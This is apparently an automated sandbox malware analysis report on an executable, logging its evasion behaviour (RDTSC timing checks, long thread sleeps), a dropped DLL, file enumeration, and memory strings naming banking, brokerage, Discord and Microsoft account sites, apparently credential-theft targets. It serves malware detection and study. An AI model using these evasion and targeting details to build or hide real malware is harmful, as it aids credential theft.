            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeAPI/Special instruction interceptor: Address: 4645CA5
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeAPI/Special instruction interceptor: Address: 3595CA5
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeRDTSC instruction interceptor: First address: 461E469 second address: 461E469 instructions: 0x00000000 rdtsc 0x00000002 test ax, 000022EAh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF72515F180h 0x0000000a test esi, 590B1F5Fh 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeRDTSC instruction interceptor: First address: 356E469 second address: 356E469 instructions: 0x00000000 rdtsc 0x00000002 test ax, 000022EAh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF724B24120h 0x0000000a test esi, 590B1F5Fh 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeMemory allocated: 4BA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeMemory allocated: 35370000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeMemory allocated: 37370000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599668Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599228Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597702Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597592Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597462Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597249Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597139Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597027Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596915Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596695Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596591Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596472Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596350Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595483Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595155Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeWindow / User API: threadDelayed 2594Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeWindow / User API: threadDelayed 7260Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn7848.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep count: 43 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -39660499758475511s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 344Thread sleep count: 2594 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 344Thread sleep count: 7260 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599668s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599228s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598577s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598248s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597702s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597592s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597462s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597249s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597139s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -597027s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596915s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596591s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596472s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596350s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595483s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595155s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -595047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_0040646B FindFirstFileA,FindClose,10_2_0040646B
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_004027A1 FindFirstFileA,10_2_004027A1
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeCode function: 10_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_004058BF
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599668Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599228Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598577Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597702Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597592Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597462Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597249Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597139Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 597027Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596915Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596695Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596591Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596472Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596350Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595483Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595155Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 595047Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\hUMdKouQ1H.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3820358156.0000000035559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd64d42dcde309<
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D38000.00000004.00000020.00020000.00000000.sdmp, hUMdKouQ1H.exe, 0000000A.00000002.3799637665.0000000004D98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: hUMdKouQ1H.exe, 0000000A.00000002.3821501336.00000000365EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
